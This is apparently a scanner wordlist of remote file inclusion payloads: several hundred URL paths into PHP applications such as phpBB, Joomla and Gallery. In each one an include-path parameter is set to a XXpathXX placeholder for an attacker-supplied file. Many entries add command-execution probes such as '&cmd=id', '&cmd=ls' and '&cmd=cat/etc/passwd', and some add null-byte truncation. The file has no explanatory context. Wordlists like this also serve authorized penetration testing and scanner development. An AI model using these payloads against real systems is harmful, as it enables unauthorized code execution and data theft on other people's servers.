/files/folder-create.php3?BSX_LIBDIR=XXpathXX
/files/folder-delete.php3?BSX_LIBDIR=XXpathXX
/files/folder-empty.php3?BSX_LIBDIR=XXpathXX
/files/folder-rename.php3?BSX_LIBDIR=XXpathXX
/files/folders.php3?BSX_LIBDIR=XXpathXX
/files/login.php3?err=hack&BSX_HTXDIR=XXpathXX
/files/mainfile.php?page[path]=XXpathXX?&cmd=ls
/files/mbox-list.php3?BSX_LIBDIR=XXpathXX
/files/message-delete.php3?BSX_LIBDIR=XXpathXX
/files/message-forward.php3?BSX_LIBDIR=XXpathXX
/files/message-header.php3?BSX_LIBDIR=XXpathXX
/files/message-print.php3?BSX_LIBDIR=XXpathXX
/files/message-read.php3?BSX_LIBDIR=XXpathXX
/files/message-reply.php3?BSX_LIBDIR=XXpathXX
/files/message-replyall.php3?BSX_LIBDIR=XXpathXX
/files/message-search.php3?BSX_LIBDIR=XXpathXX
/findix/index.php?page=XXpathXX?&cmd=id
/fishcart_v3/fc_functions/fc_example.php?docroot=XXpathXX
/flushcmd/Include/editor/rich_files/class.rich.php?class_path=XXpathXX?
/fonctions/template.php?repphp=XXpathXX?
/fonctions_racine.php?chemin_lib=XXpathXX
/footer.inc.php?settings[footer]=XXpathXX
/footer.inc.php?tfooter=XXpathXX?
/footer.php?footer_file=XXpathXX
/footer.php?op[footer_body]=XXpathXX?
/form.php?path=XXpathXX?&cmd=pwd
/forum.php?cfg_file=1&fpath=XXpathXX?
/forum/forum.php?view=XXpathXX
/forum/forum82lib.php3?repertorylevel=XXpathXX?
/forum/gesfil.php?repertorylevel=XXpathXX?
/forum/lostpassword.php?repertorylevel=XXpathXX?
/forum/mail.php?repertorylevel=XXpathXX?
/forum/member.php?repertorylevel=XXpathXX?
/forum/message.php?repertorylevel=XXpathXX?
/forum/search.php?repertorylevel=XXpathXX?
/forum/track.php?path=XXpathXX
/frame.php?framefile=XXpathXX
/ftp.php?path_local=XXpathXX
/function.inc.php?path=XXpathXX
/function.php?adminfolder=XXpathXX
/function.php?gbpfad=XXpathXX
/functions.php?include_path=XXpathXX
/functions.php?pmp_rel_path=XXpathXX
/functions.php?s[phppath]=XXpathXX
/functions.php?set_path=XXpathXX?
/functions/form.func.php?GLOBALS[PTH][classes]=XXpathXX?
/functions/general.func.php?GLOBALS[PTH][classes]=XXpathXX?
/functions/groups.func.php?GLOBALS[PTH][classes]=XXpathXX?
/functions/js.func.php?GLOBALS[PTH][classes]=XXpathXX?
/functions/prepend_adm.php?SETS[path][physical]=XXpathXX
/functions/prepend_adm.php?SETS[path][physical]=XXpathXX?
/functions/sections.func.php?GLOBALS[PTH][classes]=XXpathXX?
/functions/users.func.php?GLOBALS[PTH][classes]=XXpathXX?
/functions_mod_user.php?phpbb_root_path=XXpathXX?&cmd=ls
/fusebox5.php?FUSEBOX_APPLICATION_PATH=XXpathXX
/galerie.php?config[root_ordner]=XXpathXX?cmd=id
/gallery/captionator.php?GALLERY_BASEDIR=XXpathXX
/gallery/lib/content.php?include=XXpathXX?cmd=ls
/gallery/theme/include_mode/template.php?galleryfilesdir=XXpathXX
/gallerypath/index.php?includepath=XXpathXX
/games.php?id=XXpathXX
/games.php?scoreid=XXpathXX
/gbook/includes/header.php?abspath=XXpathXX?
/gemini/page/forums/bottom.php?lang=XXpathXX?
/gen_m3u.php?phpbb_root_path=XXpathXX
/genepi.php?topdir=XXpathXX
/generate.php?ht_pfad=XXpathXX?
/gepi/gestion/savebackup.php?filename=XXpathXX&cmd=cat/etc/passwd
/gestArt/aide.php3?aide=XXpathXX?
/get_session_vars.php?path_to_smf=XXpathXX
/getpage.php?page=online&doc_path=XXpathXX
/global.php?abs_path=XXpathXX?
/gorum/dbproperty.php?appDirName=XXpathXX
/gpb/include/db.mysql.inc.php?root_path=XXpathXX?
/gpb/include/gpb.inc.php?root_path=XXpathXX?
/graph.php?DOCUMENT_ROOT=XXpathXX?
/gruppen.php?config[root_ordner]=XXpathXX?&cmd=id
/handlers/email/mod.listmail.php?_PM_[path][handle]=XXpathXX
/handlers/page/show.php?sous_rep=XXpathXX
/head.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/header.inc.php?CssFile=XXpathXX
/header.php?path=XXpathXX
/header.php?wwwRoot=XXpathXX
/help.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/help/index.php?show=XXpathXX
/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=XXpathXX
/helperfunction.php?includedir=XXpathXX
/hioxBannerRotate.php?hm=XXpathXX
/hioxRandomAd.php?hm=XXpathXX
/hioxstats.php?hm=XXpathXX
/hioxupdate.php?hm=XXpathXX
/home.php?a=XXpathXX
/home.php?page=XXpathXX
/home.php?pagina=XXpathXX
/home/www/images/doc/index2.php?type=XXpathXX
/home1.php?ln=XXpathXX
/home2.php?ln=XXpathXX
/hsList.php?subdir=XXpathXX?&cmd=ls
/htdocs/gmapfactory/params.php?gszAppPath=XXpathXX
/html/admin/modules/plugin_admin.php?_settings[pluginpath]=XXpathXX
/hu/modules/reg-new/modstart.php?mod_dir=XXpathXX?
/i_head.php?home=XXpathXX
/i_nav.php?home=XXpathXX
/iframe.php?file=XXpathXX
/image.php?url=XXpathXX???
/impex/ImpExData.php?systempath=XXpathXX
/import.php?bibtexrootrel=XXpathXX?
/importinfo.php?bibtexrootrel=XXpathXX?
/in.php?returnpath=XXpathXX
/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=XXpathXX
/inc/config.inc.php?x[1]=XXpathXX
/inc/design.inc.php?dir[data]=XXpathXX
/inc/download_center_lite.inc.php?script_root=XXpathXX
/inc/formmail.inc.php?script_root=XXpathXX
/inc/gabarits.php?cfg_racine=XXpathXX
/inc/header.inc.php?ficStyle=XXpathXX
/inc/ifunctions.php?GLOBALS[phpQRootDir]=XXpathXX
/inc/inc.php?cfg_racine=XXpathXX?
/inc/indexhead.php?fileloc=XXpathXX?
/inc/irayofuncs.php?irayodirhack=XXpathXX?
/inc/libs/Smarty_Compiler.class.php?plugin_file=XXpathXX?
/inc/libs/core/core.display_debug_console.php?plugin_file=XXpathXX?
/inc/libs/core/core.load_plugins.php?plugin_file=XXpathXX?
/inc/libs/core/core.load_resource_plugin.php?plugin_file=XXpathXX?
/inc/libs/core/core.process_cached_inserts.php?plugin_file=XXpathXX?
/inc/libs/core/core.process_compiled_include.php?plugin_file=XXpathXX?
/inc/libs/core/core.read_cache_file.php?plugin_file=XXpathXX?
/inc/linkbar.php?cfile=XXpathXX?
/inc/login.php?pathCGX=XXpathXX
/inc/logingecon.php?pathCGX=XXpathXX
/inc/ltdialogo.php?pathCGX=XXpathXX
/inc/mtdialogo.php?pathCGX=XXpathXX
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=XXpathXX?
/inc/prepend.inc.php?path=XXpathXX?
/inc/service.alert.inc.php?SPL_CFG[dirroot]=XXpathXX?
/inc/settings.php?inc_dir=XXpathXX
/inc/settings.ses.php?SPL_CFG[dirroot]=XXpathXX?
/inc/shows.inc.php?cutepath=XXpathXX?
/inc/sige_init.php?SYS_PATH=XXpathXX?
/inc_group.php?include_path=XXpathXX?
/inc_manager.php?include_path=XXpathXX?
/inc_newgroup.php.php?include_path=XXpathXX?
/inc_smb_conf.php?include_path=XXpathXX?
/inc_user.php?include_path=XXpathXX?
/include.php?_APP_RELATIVE_PATH=XXpathXX
/include.php?gorumDir=XXpathXX
/include.php?myng_root=XXpathXX
/include.php?path=psp/user.php&site=XXpathXX
/include.php?path[docroot]=XXpathXX
/include.php?sunPath=XXpathXX
/include/Beautifier/Core.php?BEAUT_PATH=XXpathXX
/include/HTML_oben.php?include_path=XXpathXX
/include/HTML_oben.php?include_path=XXpathXX?
/include/SQuery/gameSpy2.php?libpath=XXpathXX
/include/bbs.lib.inc.php?site_path=XXpathXX
/include/class_yapbbcooker.php?cfgIncludeDirectory=XXpathXX
/include/classes.php?INCLUDE_DIR=XXpathXX?
/include/client.php?INCLUDE_DIR=XXpathXX?
/include/cls_headline_prod.php?INCLUDE_PATH=XXpathXX
/include/cls_listorders.php?INCLUDE_PATH=XXpathXX
/include/cls_viewpastorders.php?INCLUDE_PATH=XXpathXX
/include/common.php?XOOPS_ROOT_PATH=XXpathXX
/include/common_functions.php?baros_path=XXpathXX?
/include/config.inc.php?racine=XXpathXX
/include/copyright.php?tsep_config[absPath]=XXpathXX?cmd=ls
/include/customize.php?l=XXpathXX&text=Hello%20World
/include/default_header.php?script_path=XXpathXX
/include/define.php?INC_DIR=XXpathXX?
/include/disp_form.php3?cfg_include_dir=XXpathXX?
/include/disp_smileys.php3?cfg_include_dir=XXpathXX?
/include/dom.php?path=XXpathXX
/include/dtd.php?path=XXpathXX
/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=XXpathXX?
/include/engine/content/elements/menu.php?CONFIG[AdminPath]=XXpathXX
/include/forms.php?INCLUDE_DIR=XXpathXX?
/include/global.php?pfad=XXpathXX
/include/header.php?cs_base_path=XXpathXX?
/include/html/nettools.popup.php?DIR=XXpathXX
/include/inc.foot.php?root=XXpathXX
/include/inc_ext/spaw/dialogs/table.php?spaw_root=XXpathXX
/include/inc_freigabe.php?include_path=XXpathXX?
/include/inc_freigabe1.php?include_path=XXpathXX?
/include/inc_freigabe3.php?include_path=XXpathXX?
/include/include_stream.inc.php?include_path=XXpathXX
/include/include_top.php?g_include=XXpathXX
/include/includes.php?include_path=XXpathXX
/include/index.php3?cfg_include_dir=XXpathXX?
/include/init.inc.php?G_PATH=XXpathXX
/include/issue_edit.php?INCLUDE_DIR=XXpathXX?
/include/lib/lib_slots.php?main_path=XXpathXX
/include/lib/lib_stats.php?main_path=XXpathXX?
/include/lib/lib_users.php?main_path=XXpathXX?
/include/little_news.php3?cfg_include_dir=XXpathXX?
/include/livre_include.php?no_connect=lol&chem_absolu=XXpathXX?
/include/loading.php?path_include=XXpathXX
/include/mail.inc.php?root=XXpathXX
/include/menu_builder.php?config[page_dir]=XXpathXX?
/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=XXpathXX
/include/monitoring/engine/MakeXML.php?fileOreonConf=XXpathXX?
/include/parser.php?path=XXpathXX
/include/pear/IT.php?basepath=XXpathXX?
/include/pear/ITX.php?basepath=XXpathXX?
/include/pear/IT_Error.php?basepath=XXpathXX?
/include/phpxd/phpXD.php?appconf[rootpath]=XXpathXX?&cmd=id
/include/prodler.class.php?sPath=XXpathXX???
/include/scripts/export_batch.inc.php?DIR=XXpathXX
/include/scripts/run_auto_suspend.cron.php?DIR=XXpathXX
/include/scripts/send_email_cache.php?DIR=XXpathXX
/include/startup.inc.php?root_path=XXpathXX?
/include/themes/themefunc.php?myNewsConf[path][sys][index]=XXpathXX?
/include/timesheet.php?config[include_dir]=XXpathXX
/include/urights.php?CRM_inc=XXpathXX
/includes/admin_board2.php?phpbb_root_path=XXpathXX?ls
/includes/admin_logger.php?phpbb_root_path=XXpathXX?ls
/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=XXpathXX?
/includes/ajax_listado.php?urlModulo=XXpathXX
/includes/archive/archive_topic.php?phpbb_root_path=XXpathXX?
/includes/bbcb_mg.php?phpbb_root_path=XXpathXX?
/includes/begin.inc.php?PagePrefix=XXpathXX
/includes/blogger.php?path_prefix=XXpathXX
/includes/class/class_tpl.php?cache_file=XXpathXX?
/includes/class_template.php?quezza_root_path=XXpathXX
/includes/classes/pctemplate.php?pcConfig[smartyPath]=XXpathXX?cmd
/includes/common.inc.php?CONFIG[BASE_PATH]=XXpathXX
/includes/common.php?module_root_path=XXpathXX?
/includes/common.php?root=XXpathXX?
/includes/common.php?root_path=XXpathXX?
/includes/config.inc.php?racineTBS=XXpathXX
/includes/config/master.inc.php?fm_data[root]=XXpathXX?
/includes/connection.inc.php?PagePrefix=XXpathXX
/includes/dbal.php?eqdkp_root_path=XXpathXX
/includes/events.inc.php?PagePrefix=XXpathXX
/includes/footer.html.inc.php?tc_config[app_root]=XXpathXX?
/includes/footer.inc.php?PagePrefix=XXpathXX
/includes/footer.php?PHPGREETZ_INCLUDE_DIR=XXpathXX
/includes/functions.inc.php?sitepath=XXpathXX?
/includes/functions.php?location=XXpathXX
/includes/functions.php?phpbb_root_path=XXpathXX
/includes/functions.php?phpbb_root_path=XXpathXX?
/includes/functions/auto_email_notify.php?path_prefix=XXpathXX
/includes/functions/html_generate.php?path_prefix=XXpathXX
/includes/functions/master.inc.php?fm_data[root]=XXpathXX?
/includes/functions/validations.php?path_prefix=XXpathXX
/includes/functions_admin.php?phpbb_root_path=XXpathXX?
/includes/functions_install.php?vwar_root=XXpathXX
/includes/functions_kb.php?phpbb_root_path=XXpathXX?
/includes/functions_mod_user.php?phpbb_root_path=XXpathXX?
/includes/functions_portal.php?phpbb_root_path=XXpathXX?
/includes/functions_user_viewed_posts.php?phpbb_root_path=XXpathXX?
/includes/global.php?nbs=XXpathXX?
/includes/header.inc.php?PagePrefix=XXpathXX
/includes/header.inc.php?dateiPfad=XXpathXX
/includes/include_once.php?include_file=XXpathXX
/includes/init.php?includepath=XXpathXX?
/includes/iplogger.php?phpbb_root_path=XXpathXX?ls
/includes/kb_constants.php?module_root_path=XXpathXX
/includes/lang/language.php?path_to_root=XXpathXX
/includes/lib-account.inc.php?CONF_CONFIG_PATH=XXpathXX?
/includes/lib-group.inc.php?CONF_CONFIG_PATH=XXpathXX?
/includes/lib-log.inc.php?CONF_CONFIG_PATH=XXpathXX?
/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=XXpathXX?
/includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=XXpathXX?
/includes/lib-themes.inc.php?CONF_CONFIG_PATH=XXpathXX?
/includes/logger_engine.php?phpbb_root_path=XXpathXX
/includes/menuleft.inc.php?PagePrefix=XXpathXX
/includes/mkb.php?phpbb_root_path=XXpathXX?ls
/includes/morcegoCMS/adodb/adodb.inc.php?path=XXpathXX
/includes/morcegoCMS/morcegoCMS.php?fichero=XXpathXX
/includes/mx_common.php?module_root_path=XXpathXX?
/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=XXpathXX
/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=XXpathXX
/includes/pafiledb_constants.php?module_root_path=XXpathXX
/includes/pages.inc.php?PagePrefix=XXpathXX
/includes/phpdig/includes/config.php?relative_script_path=XXpathXX
/includes/profilcp_constants.php?module_root_path=XXpathXX?
/includes/settings.inc.php?approot=XXpathXX
/includes/template.php?myevent_path=XXpathXX
/includes/themen_portal_mitte.php?phpbb_root_path=XXpathXX
/includes/tumbnail.php?config[root_ordner]=XXpathXX?
/includes/usercp_register.php?phpbb_root_path=XXpathXX?
/includes/usercp_viewprofile.php?phpbb_root_path=XXpathXX?
/includes/xhtml.php?d_root=XXpathXX?
/index.php3?Application_Root=XXpathXX
/index.php?1=lol&PAGES[lol]=XXpathXX
/index.php?AML_opensite=XXpathXX
/index.php?AMV_openconfig=1&AMV_serverpath=XXpathXX
/index.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/index.php?ConfigDir=XXpathXX
/index.php?DIR_PLUGINS=XXpathXX
/index.php?G_JGALL[inc_path]=XXpathXX%00
/index.php?HomeDir=XXpathXX
/index.php?Lang=AR&Page=XXpathXX
/index.php?Madoa=XXpathXX?
/index.php?RP_PATH=XXpathXX
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=XXpathXX
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=XXpathXX
/index.php?abg_path=XXpathXX?
/index.php?abs_path=XXpathXX?
/index.php?adduser=true&lang=XXpathXX
/index.php?adodb=XXpathXX
/index.php?ads_file=XXpathXX
/index.php?arquivo=XXpathXX
/index.php?back=XXpathXX
/index.php?base==XXpathXX
/index.php?basePath=XXpathXX
/index.php?bibtexrootrel=XXpathXX?
/index.php?blog_dc_path=XXpathXX
/index.php?blog_theme=XXpathXX
/index.php?body=XXpathXX
/index.php?class_path=XXpathXX?
/index.php?classified_path=XXpathXX?
/index.php?cms=XXpathXX?
/index.php?config["sipssys"]=XXpathXX
/index.php?config[root_ordner]=XXpathXX?&cmd=id
/index.php?config[root_ordner]=XXpathXX?cmd=id
/index.php?config_atkroot=XXpathXX
/index.php?configuration=XXpathXX
/index.php?custom_admin_path=XXpathXX?
/index.php?dateiPfad=XXpathXX?&cmd=ls
/index.php?de=XXpathXX
/index.php?dept=XXpathXX
/index.php?do=XXpathXX
/index.php?exec=XXpathXX?
/index.php?ext=XXpathXX
/index.php?faq_path=XXpathXX?&cmd=id
/index.php?file_name[]=XXpathXX?
/index.php?file_path=XXpathXX?
/index.php?fileloc=XXpathXX
/index.php?from=XXpathXX
/index.php?func=XXpathXX?
/index.php?function=XXpathXX
/index.php?function=custom&custom=XXpathXX
/index.php?gOo=XXpathXX
/index.php?gen=XXpathXX
/index.php?get=XXpathXX
/index.php?home_name=XXpathXX
/index.php?ilang=XXpathXX?
/index.php?inc_dir=XXpathXX
/index.php?inc_dir=XXpathXX?
/index.php?includeDir=XXpathXX
/index.php?includeFooter=XXpathXX
/index.php?includesdir=XXpathXX
/index.php?insPath=XXpathXX
/index.php?lang=XXpathXX
/index.php?language=XXpathXX?
/index.php?language=en&main_page=XXpathXX
/index.php?lizge=XXpathXX?&cmd=ls
/index.php?lng=XXpathXX
/index.php?load=XXpathXX
/index.php?loadpage=XXpathXX
/index.php?main_tabid=1&main_content=XXpathXX
/index.php?may=XXpathXX
/index.php?middle=XXpathXX
/index.php?mode=XXpathXX
/index.php?modpath=XXpathXX
/index.php?module=PostWrap&page=XXpathXX
/index.php?mosConfig_absolute_path=XXpathXX
/index.php?news7["functions"]=XXpathXX
/index.php?news_include_path=XXpathXX
/index.php?open=XXpathXX
/index.php?option=com_custompages&cpage=XXpathXX?
/index.php?page=XXpathXX
/index.php?page=XXpathXX%00
/index.php?page=XXpathXX?
/index.php?pageXXpathXX
/index.php?page[path]=XXpathXX?&cmd=ls
/index.php?pagename=XXpathXX
/index.php?pager=XXpathXX
/index.php?pagina=XXpathXX?
/index.php?path_to_folder=XXpathXX?cmd=id
/index.php?pg=XXpathXX?
/index.php?phpbb_root_path=XXpathXX
/index.php?plugin=XXpathXX
/index.php?principal=XXpathXX
/index.php?proMod=XXpathXX
/index.php?proMod=XXpathXX?cmd
/index.php?project=XXpathXX
/index.php?repinc=XXpathXX?
/index.php?root_prefix=XXpathXX
/index.php?root_prefix=XXpathXX?
/index.php?section=XXpathXX
/index.php?site=XXpathXX
/index.php?site_path=XXpathXX
/index.php?styl[top]=XXpathXX??
/index.php?template=XXpathXX?
/index.php?templates_dir=XXpathXX?
/index.php?theme=XXpathXX
/index.php?themepath=XXpathXX?
/index.php?themesdir=XXpathXX
/index.php?this_path=XXpathXX?
/index.php?txt=XXpathXX
/index.php?up=XXpathXX
/index.php?url=XXpathXX
/index.php?w=XXpathXX
/index.php?way=XXpathXX??????????????
/index1.php?=XXpathXX
/index1.php?inc=XXpathXX
/index1.php?inhalt=XXpathXX
/index2.php?=XXpathXX
/index2.php?content=XXpathXX
/index2.php?s=XXpathXX
/index2.php?x=XXpathXX
/indexinfo.php?bibtexrootrel=XXpathXX?
/indexk.php?lib_path=XXpathXX?
/info.php?file=XXpathXX
/inhalt.php?dateien[news]=XXpathXX?
/init.php?API_HOME_DIR=XXpathXX
/init.php?scriptpath=XXpathXX?
/initialize.php?hmail_config[includepath]=XXpathXX&cmd=dir
/initiate.php?abs_path=XXpathXX
/install.php?_NE[AbsPath]=XXpathXX
/install.php?install_dir=XXpathXX
/install/config.php?path=XXpathXX
/install/di.php?pathtoserverdata=XXpathXX
/install/index.php?content_php=XXpathXX
/install/install3.php?database=none&cabsolute_path=XXpathXX
/integration/shortstat/configuration.php?SPL_CFG[dirroot]=XXpathXX?
/interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=XXpathXX?
/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=XXpathXX?
/interface/billing/billing_process.php?srcdir=XXpathXX?
/interface/editors/-custom.php?bField[bf_data]=XXpathXX
/interface/editors/custom.php?bField[bf_data]=XXpathXX
/interface/new/new_patient_save.php?srcdir=XXpathXX?
/intern/admin/?rootdir=XXpathXX
/intern/admin/other/backup.php?admin=1&rootdir=XXpathXX
/intern/clan/member_add.php?rootdir=XXpathXX
/intern/config/forum.php?rootdir=XXpathXX
/intern/config/key_2.php?rootdir=XXpathXX
/ip.inc.php?type=1&cgipath=XXpathXX
/ipeer_site/?page=XXpathXX?
/joinus.php?vwar_root=XXpathXX
/joinus.php?vwar_root=XXpathXX?&cmd=ls
/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=XXpathXX?
/joomla_path/components/com_articles.php?absolute_path=XXpathXX?
/js/bbcodepress/bbcode-form.php?BBCODE_path=XXpathXX
/js/wptable-tinymce.php?ABSPATH=XXpathXX
/jscript.php?my_ms[root]=XXpathXX?
/kernel/class/ixpts.class.php?IXP_ROOT_PATH=XXpathXX
/kernel/loadkernel.php?installPath=XXpathXX
/kmitaadmin/kmitam/htmlcode.php?file=XXpathXX?
/ktmlpro/includes/ktedit/toolbar.php?dirDepth=XXpathXX
/lang/leslangues.php?fichier=XXpathXX
/lang_english/lang_main_album.php?phpbb_root_path=XXpathXX?a=
/language/lang_english/lang_activity.php?phpbb_root_path=XXpathXX
/language/lang_english/lang_admin_album.php?phpbb_root_path=XXpathXX?a=
/language/lang_german/lang_admin_album.php?phpbb_root_path=XXpathXX?a=
/language/lang_german/lang_main_album.php?phpbb_root_path=XXpathXX?a=
/latestposts.php?forumspath=XXpathXX
/latex.php?bibtexrootrel=XXpathXX?
/layout/default/params.php?gConf[dir][layouts]=XXpathXX?
/ldap/authldap.php?includePath=XXpathXX
/learnPath/include/scormExport.inc.php?includePath=XXpathXX
/lib.editor.inc.php?sys_path=XXpathXX?
/lib/Loggix/Module/Calendar.php?pathToIndex=XXpathXX
/lib/Loggix/Module/Comment.php?pathToIndex=XXpathXX
/lib/Loggix/Module/Rss.php?pathToIndex=XXpathXX
/lib/Loggix/Module/Trackback.php?pathToIndex=XXpathXX
/lib/action/rss.php?lib=XXpathXX?
/lib/activeutil.php?set[include_path]=XXpathXX?
/lib/addressbook.php?GLOBALS[basedir]=XXpathXX
/lib/armygame.php?libpath=XXpathXX
/lib/authuser.php?root=XXpathXX
/lib/base.php?BaseCfg[BaseDir]=XXpathXX
/lib/connect.php?root=XXpathXX
/lib/connected_users.lib.php3?ChatPath=XXpathXX
/lib/connected_users.lib.php3?ChatPath=XXpathXX?
/lib/db/mysql.class.php?root=XXpathXX
/lib/db/postgres.class.php?root=XXpathXX
/lib/functions.php?DOC_ROOT=XXpathXX
/lib/googlesearch/GoogleSearch.php?APP[path][lib]=XXpathXX?
/lib/header.php?DOC_ROOT=XXpathXX
/lib/language.php?_LIB_DIR=XXpathXX
/lib/live_status.lib.php?ROOT=XXpathXX
/lib/misc.php?root=XXpathXX
/lib/nl/nl.php?g_strRootDir=XXpathXX
/lib/obj/collection.class.php?GLOBALS[application][app_root]=XXpathXX
/lib/obj/content_image.class.php?GLOBALS[application][app_root]=XXpathXX
/lib/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX
/lib/pcltrace.lib.php?g_pcltar_lib_dir=XXpathXX
/lib/rs.php?rootpath=XXpathXX
/lib/selectlang.php?BBC_LANGUAGE_PATH=XXpathXX
/lib/smarty/SmartyFU.class.php?system[smarty][dir]=XXpathXX?
/lib/static/header.php?set_menu=XXpathXX
/lib/tpl.inc.php?conf[classpath]=XXpathXX
/libraries/comment/postComment.php?path[cb]=XXpathXX?a=
/libraries/database.php?path=XXpathXX???
/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=XXpathXX
/libraries/pcl/pcltar.php?g_pcltar_lib_dir=XXpathXX
/library/authorize.php?login_form=XXpathXX?
/library/translation.inc.php?GLOBALS[srcdir]=XXpathXX?
/libs/db.php?path_local=XXpathXX
/libs/ftp.php?path_local=XXpathXX
/libs/lom.php?ETCDIR=XXpathXX
/libsecure.php?abs_path=XXpathXX?
/license.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/link_main.php?phpbb_root_path=XXpathXX
/linkadmin.php?page=XXpathXX?
/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=XXpathXX?
/list.php?phpbb_root_path=XXpathXX
/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=XXpathXX
/lms_path/modules/welcome.php?_LIB_DIR=XXpathXX
/load_lang.php?_SERWEB[configdir]=XXpathXX
/load_lang.php?_SERWEB[serwebdir]=XXpathXX
/load_phplib.php?_PHPLIB[libdir]=XXpathXX
/loader.php?GLOBALS=XXpathXX
/local/lib/lcUser.php?LIBDIR=XXpathXX?
/log.php?bibtexrootrel=XXpathXX?
/login.php3?cl_headers=XXpathXX
/login.php?base_dir=XXpathXX
/login.php?blog_theme=XXpathXX
/login.php?langfile=XXpathXX
/login.php?pachtofile=XXpathXX
/login.php?srcdir=XXpathXX?
/login.php?value=XXpathXX??
/lovecms/install/index.php?step=XXpathXX?
/m2f/m2f_cron.php?m2f_root_path=XXpathXX
/m2f/m2f_forum.php?m2f_root_path=XXpathXX
/m2f/m2f_mailinglist.php?m2f_root_path=XXpathXX
/m2f/m2f_phpbb204.php?m2f_root_path=XXpathXX
/maguz.php?site=XXpathXX
/mail/childwindow.inc.php?form=XXpathXX?
/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=XXpathXX?
/mail_this_entry/mail_autocheck.php?pm_path=XXpathXX?&cmd=ls
/main.inc.php?pathtoscript=XXpathXX
/main.php?config[search_disp]=true&include_dir=XXpathXX
/main.php?id=XXpathXX
/main.php?include_path=XXpathXX?
/main.php?pageURL=XXpathXX
/main.php?pagina=XXpathXX
/main/forum/komentar.php?site_path=XXpathXX
/main/main.php?pi=XXpathXX
/main/ppcbannerclick.php?INC=XXpathXX?
/main/ppcclick.php?INC=XXpathXX?
/main_prepend.php?_SERWEB[functionsdir]=XXpathXX
/mainpage.php?docroot=XXpathXX?cmd
/mamboleto.php?mosConfig_absolute_path=XXpathXX
/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=XXpathXX
/manage_songs.php?foing_root_path=XXpathXX
/manager/admin/index.php?MGR=XXpathXX
/manager/admin/p_ins.php?MGR=XXpathXX
/manager/admin/u_ins.php?MGR=XXpathXX
/manager/articles.php?_PX_config[manager_path]=XXpathXX
/manager/static/view.php?propID=0&INC=XXpathXX
/master.php?root_path=XXpathXX
/mcNews/admin/header.php?skinfile=XXpathXX
/mcf.php?content=XXpathXX
/mcnews/admin/install.php?l=XXpathXX
/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=XXpathXX
/member.php?vwar_root=XXpathXX
/member/usercp_menu.php?script_folder=XXpathXX
/members/index.php?INC=XXpathXX?
/members/registration.php?INC=XXpathXX?
/members_help.php?hlp=XXpathXX?
/membres/membreManager.php?include_path=XXpathXX?
/menu.php3?cl_headers=XXpathXX
/menu.php?functions_file=XXpathXX
/mep/frame.php?chem=XXpathXX?
/microcms/includes/file_manager/special.php?fm_includes_special=XXpathXX
/middle.php?file=XXpathXX
/migrateNE2toNE3.php?_NE[AbsPath]=XXpathXX
/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=XXpathXX?
/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=XXpathXX?
/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=XXpathXX?
/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=XXpathXX?
/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=XXpathXX?
/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=XXpathXX?
/mini-pub.php/front-end/img.php?sFileName=XXpathXX?
/minimal/wiki.php?page=XXpathXX?
/misc/function.php3?path=XXpathXX?
/mitglieder.php?config[root_ordner]=XXpathXX?&cmd=id
/mkportal/include/user.php?MK_PATH=XXpathXX
/mkportal/include/user.php?MK_PATH=XXpathXX?
/mod/authent.php4?rootpath=XXpathXX
/mod/image/index.php?config[pathMod]=XXpathXX
/mod/liens/index.php?config[pathMod]=XXpathXX
/mod/liste/index.php?config[pathMod]=XXpathXX
/mod/special/index.php?config[pathMod]=XXpathXX
/mod/texte/index.php?config[pathMod]=XXpathXX
/mod_membre/inscription.php?chemin=XXpathXX?
/mod_phpalbum/sommaire_admin.php?chemin=XXpathXX?
/modernbill/include/html/config.php?DIR=XXpathXX
/modifyform.html?code=XXpathXX
/mods/business_functions.php?GALLERY_BASEDIR=XXpathXX
/mods/config/load.inc.php?moddir=XXpathXX?
/mods/http/load.inc.php?moddir=XXpathXX?
/mods/ui_functions.php?GALLERY_BASEDIR=XXpathXX
/module/forum/forum.php?fd=XXpathXX=';
/module/forum/main.php?id=1&main_dir=XXpathXX?&
/modules.php?name=XXpathXX&file=article&sid=2
/modules/4nAlbum/public/displayCategory.php?basepath=XXpathXX
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=XXpathXX
/modules/Calendar/admin/update.php?calpath=XXpathXX?
/modules/Calendar/calendar.php?calpath=XXpathXX?
/modules/Calendar/scheme.php?calpath=XXpathXX?
/modules/Discipline/CategoryBreakdownTime.php?FocusPath=XXpathXX
/modules/Discipline/CategoryBreakdownTime.php?staticpath=XXpathXX
/modules/Discipline/StudentFieldBreakdown.php?staticpath=XXpathXX
/modules/Forums/admin/admin_styles.php?phpbb_root_path=XXpathXX
